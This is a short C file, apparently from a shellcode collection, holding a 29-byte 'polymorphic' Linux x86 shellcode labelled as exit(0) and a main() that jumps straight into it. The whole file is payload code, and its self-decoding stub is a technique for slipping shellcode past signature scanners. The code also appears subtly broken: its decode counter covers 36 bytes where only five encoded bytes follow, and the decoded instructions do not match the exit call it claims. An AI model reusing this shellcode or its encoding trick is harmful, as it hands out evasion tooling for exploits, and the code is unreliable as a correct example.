// linux/x86 exit(0) polymorphic shellcode - 29 bytes
// Febriyanto Nugroho
#include <stdio.h>
char
shellcode[] =
"\xeb\x11\x5e\x31\xc9\xb1\x24"
"\x80\x6c\x0e\xff\x01\x80\xe9"
"\x01\x75\xf6\xeb\x05\xe8\xea"
"\xff\xff\xff\x6b\x1e\x5a\xce"
"\x81"
;
int
main(
int
argc,
char
**argv) {
asm(
"jmp %0;"
:
"=m"
(shellcode));
}